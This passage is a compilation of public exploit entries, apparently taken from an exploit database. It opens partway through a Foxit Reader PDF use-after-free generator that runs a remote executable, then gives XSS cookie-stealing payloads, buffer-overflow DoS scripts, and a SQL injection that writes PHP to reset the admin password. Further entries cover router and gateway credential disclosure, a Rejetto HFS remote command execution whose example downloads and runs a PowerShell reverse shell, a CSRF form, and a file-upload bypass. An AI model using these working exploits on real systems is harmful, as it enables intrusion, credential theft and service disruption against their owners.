    leak_vtable();
    control_memory();
    trigger_uaf();
}

if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
        if (app.appFoxitVersion == "9.0.1.1049"){
            main();
        }
    }
}

)>> trailer <</Root 1 0 R>>
'''

import sys

#Enforces 2 hex char byte notation. "0" becomes "0x00"
def format_byte(b):

    if (len(b) > 2) and (b[0:2] == '0x'):
        b = b[2:]

    if len(b) == 1:
        b = '0' + b

    return '0x' + b

def char2hex(c):
    return format_byte(hex(ord(c)))

#Converts file path into array of eleven 32-bit hex words
def path_to_machine_code(path,little_endian = True):

    print("[+] Encoding Path:",path)

    #ensure length
    if len(path) > 44:
        print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
        exit(-1)

    #Copy path into 4 character (32 bit) words (max 11)
    word_array = []
    for i in range(11):
        
        word = ''

        if len(path):
            word += path[0:4] if len(path) >= 4 else path
            path = path[len(word):]
        
        if len(word) < 4:
            word += chr(0) * (4 - len(word))

        word_array.append(word)

    #Convert chars to hex values and format to "0xAABBCCDD" notation
    hex_array = []
    for word in word_array:
            
        #Reverse byte order to fit little endian standard
        if(little_endian): word = word[::-1]

        #Write bytes to hex strings
        hex_string = '0x'
        for char in word:
            hex_string += char2hex(char)[2:] #strip the 0x off the byte here

        hex_array.append(hex_string)
   
    return hex_array

#writes encoded path to rop array to match template
def create_rop(hex_arr, start_index = '0c'):

    ord_array = []

    index = int(start_index,16)

    for instruction in hex_arr:

        full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"

        ord_array.append(full_instruction)
    
        index += 1

    return ('\n'.join(ord_array))
    
    

if __name__ == '__main__':
    
    if len(sys.argv) != 3:
        print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")
        print("-- EXAMPLES --")
        print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")

        exit(-1)

    #Parse user args
    EXE_PATH = sys.argv[1] 
    PDF_PATH = sys.argv[2]

    #Generate hex
    raw_hex = path_to_machine_code(EXE_PATH)

    print("[+] Machine Code:")
    for hex_word in raw_hex:
        print(hex_word)

    ord_string = create_rop(raw_hex)

    print("[+] Instructions to add:")
    print(ord_string)

    print("[+] Generating pdf...")

    print("\t- Filling template...")
    evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)
    
    print("\t- Writing file...")
    with open(PDF_PATH,'w') as fd:
        fd.write(evil_pdf)

    print("[+] Generated pdf:",PDF_PATH)
HireHackking 
# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
# Date: 2020-08-22
# Exploit Author: Vyshnav NK
# Vendor Homepage: https://www.elkarbackup.org/
# Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation
# Version: 1.3.3
# Tested on: Linux

Reproduction Steps: 

1 - Go to the elakarbackup/login
2 - Login with default credentials
3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]"
4 - Click on Save 
5 - We can see the Javacript Code executed Sucessfully 


XSS Attack vectors :

"><svg/onload=alert(4)>
"><svg/onload=alert(document.cookie)>



Request : 

POST /policy/1 HTTP/1.1
Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1123
Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com
Connection: close
Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1?
Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505
Upgrade-Insecure-Requests: 1

Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on


Response :

<form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">
HireHackking 
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
HireHackking 
# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) 
# Date: 2020-08-07
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip
# Version: 1.0
# Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7
# CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
# OWASP Top Ten 2017: A1:2017-Injection
# CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9
# CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
# Vulnerability Description:
#   House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers
#   to execute arbitrary code on the hosting webserver via sending a malicious POST request.
# Vulnerable Source Code:
# /config/config.php
#   11  try {
#   12     $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass);
#   13     $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
# /index.php
#    5   if(isset($_POST['search'])) {
#    7     $keywords = $_POST['keywords'];
#   11     $keyword = explode(',', $keywords);
#   12     $concats = "(";
#   13     $numItems = count($keyword);
#   15     foreach ($keyword as $key => $value) {
#   17       if(++$i === $numItems){
#   18          $concats .= "'".$value."'";
#   19       }else{
#   20         $concats .= "'".$value."',";
#   23     $concats .= ")";
#   47         $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats");
#   48         $stmt->execute();

import requests, sys, re, json
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err  = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]


def sig():
    SIG  = F[2]+"    .-----.._       ,--.              "+F[5]+"  .__              .__________\n"
    SIG += F[2]+"    |  ..    >  "+F[4]+"___"+F[2]+" |  | .--.         "+F[5]+"  |  |__ ___.__. __| _\\_____  \\  ______ ____  ____\n"
    SIG += F[2]+"    |  |.'  ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/  /__   __   "+F[5]+"  |  |  <   |  |/ __ |  _(__  < /  ____/ __ _/ ___\\\n"
    SIG += F[2]+"    |      <"+F[4]+"/ "+F[2]+"*  *  *"+F[4]+" \\   "+F[2]+"/   \\/   \\  "+F[5]+"  |   Y  \\___  / /_/ | /       \\\\___ \\\\  ___\\  \\___\n"
    SIG += F[2]+"    |  |>   )   "+F[2]+"* *"+F[4]+"   /    "+F[2]+"\\        \\ "+F[5]+"  |___|  / ____\____ |/______  /____  >\\___  \\___  >\n"
    SIG += F[2]+"    |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+"       \\/\\/         \\/       \\/     \\/     \\/    \\/\n"
    SIG += F[2]+"        "+F[2]+"_______github.com/boku7_____  "+F[5]+"         _______github.com/hyd3sec____\n_"+F[0]+S[0]
    return SIG



def header():
    head = S[3]+F[2]+'       ---  House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0]
    return head

def formatHelp(STRING):
    return S[3]+F[2]+STRING+S[0]

if __name__ == "__main__":
    print(header())
    print(sig())
    if len(sys.argv) != 2:
        print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0]))
        print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0]))
        sys.exit(-1)
    SERVER_URL  = sys.argv[1]
    if not re.match(r".*/$", SERVER_URL):
        SERVER_URL = SERVER_URL+'/'
    INDEX_URL   = SERVER_URL + 'index.php'
    EXECUTE_URL = SERVER_URL + 'execute.php'
    LOGIN_URL   = SERVER_URL + 'auth/login.php'
    s = requests.Session()
    get_session = s.get(INDEX_URL, verify=False) 
    pdata       = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'}
    SQLi        = s.post(url=INDEX_URL, data=pdata, verify=False)
    if SQLi.status_code == 200:
        print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":")
        print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0])
    else:
        print(err+'Cannot send payload to webserver.')
        sys.exit(-1)
    try:
        print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0])
        EXECUTE     = s.get(url=EXECUTE_URL, verify=False)
    except:
        print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload')
        sys.exit(-1)
    print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0])
    print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])
HireHackking 
# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Google Dork: "Powered By Best Support System"
# Date: 2020-08-23
# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
# Vendor: Appsbd [ https://appsbd.com ]
# Software Version: 3.0.4
# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
# Tested on: Kali Linux
# CVE: CVE-2020-24963
# CWE: CWE-79


[i] :: Info:

An Authenticated Persistent XSS vulnerability was discovered in the
Best Support System, tested version — v3.0.4.


[$] :: Payloads:

13"-->">'` -- `<!--<img src="--><img src=x
onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>


[!] :: PoC (Burp Suite POST request):

POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://localhost
Connection: close
Referer: https://localhost/support-system/ticket/details/11.html
Cookie: [cookies_here]

app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
HireHackking 
# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass
# Date: 27/11/2020
# Exploit Author: Kaio Amaral
# Vendor Homepage: https://www.intelbras.com/pt-br/
# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip
# Version: firmware version 1.1.2
# Tested on: kali, android

# POC

# 1. nc host port, ex: nc 10.0.0.1 80
# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0

# Python3

import socket
from time import sleep

def exploit(host, port=80):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode()
    s.connect((host, port))
    s.send(pay)
    sleep(0.2)
    data = s.recv(17576)
    if len(data) > 1000:
        print("[+] Success.")
        return data.decode()
    print("[-] Failed. ")
    exit()

def file(data):
    with open("router.cfg", "w") as file:
        file.write(data[233:])
    print("[+] File Successfully Written.")

file(exploit("10.0.0.1"))
HireHackking 
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287

#!/usr/bin/python3

# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"

import urllib3
import sys
import urllib.parse

try:
	http = urllib3.PoolManager()	
	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
	print(url)
	response = http.request('GET', url)
	
except Exception as ex:
	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
	print(ex)
HireHackking 
# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
# Date: 2020-11-20
# Exploit Author: Zagros Bingol
# Vendor Homepage: http://www.atx.com
# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
# Version: 2.0 and earlier
# Tested on: Debian 10 64bit

-------------------------------------

Endpoint:
http://www.ip/domain.com/inc/user.ini

--------------------------------------

Proof-of-Concept:

#!/usr/bin/python3
#License: GNU General Public license v3.0
#Author: Zagros Bingol(Zagrosbingol@outlook.com)


import requests
import re

target = input("Target(ex:http://host): \n")
port = input("Port: \n")


def sploit(target, port):
print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
Credential Disclosure\n")
r = requests.post(target + ":" + port + '/inc/user.ini')
searching = re.findall(r"\[.{1,8}\]", str(r.text))
print("Usernames:\n")
print(", ".join(searching).replace("[", "").replace("]", ""))

def hash():
r = requests.post(target + '/inc/user.ini')
searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
print("Hashes:\n")
print(", ".join(searching).replace("[", "").replace("]", ""))
hash()

sploit(target, port)
HireHackking 
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Date: 20.08.2020
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10

------------------------------[Description]---------------------------------

This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
The result it crashes

 -----------------------------[Exploit]---------------------------------------------

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

import socket, sys

target = (sys.argv[1], int(sys.argv[2]))
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))
s.send(buffer)
s.close()

 -----------------------------[how to run]-----------------------------

C:\> TinyWinFTP.exe servepath port

~$ python3 exploit.py targetip port

Boom!
HireHackking 
# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp

######## Description ########

Attacker can change admin e-mail address 

## Vulnerable

- Go to the admin page view preferences
- Change the e-mail address

######## Proof of Concept ########

===> REQUEST <==== 
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences

## < SNIPP > 


verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save

#### Attack Code ####

<html>

  <body>

    <form action="http://localhost/typesetter/Admin/Preferences" method="POST">

      <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />

      <input type="hidden" name="email" value="[CHANGE HERE]" />

      <input type="hidden" name="oldpassword" value="" />

      <input type="hidden" name="password" value="" />

      <input type="hidden" name="password1" value="" />

      <input type="hidden" name="algo" value="password&#95;hash" />

      <input type="hidden" name="cmd" value="changeprefs" />

      <input type="hidden" name="aaa" value="Save" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>
HireHackking 
# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
# Exploit Author: Moaaz Taha (0xStorm)
# Date: 2020-08-20
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
# Description
This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.

#POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
HireHackking 
# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
# Google Dork: inurl:''com_gmapfp''
# Date: 2020-03-27
# Exploit Author: ThelastVvV
# Vendor Homepage: https://gmapfp.org/
# Version:Version J3.5 /J3.5free
# Tested on: Ubuntu
# CVE: CVE-2020-23972

# Description:

An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions 

# PoC:


Version J3.5
http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

-Once the attacker can locate the unauthenticated file upload form then the attacker can bypass the restriction by changing content-type and name file double extensions file.html.gif then can open file.html

# Impact
the attacker can upload malicious files can cause defacement of the site or uploading large amount of file til causes denial of service attack to Webapp/Server

# Dir File Path:
http://127.0.0.1///images/stories/gmapfp/test.html.gif
http://127.0.0.1///images/stories/gmapfp/test.html
http://127.0.0.1///images/gmapfp/test2.html.gif
http://127.0.0.1///images/gmapfp/test2.html.gif


# Issues are fixed,Please update to Last Version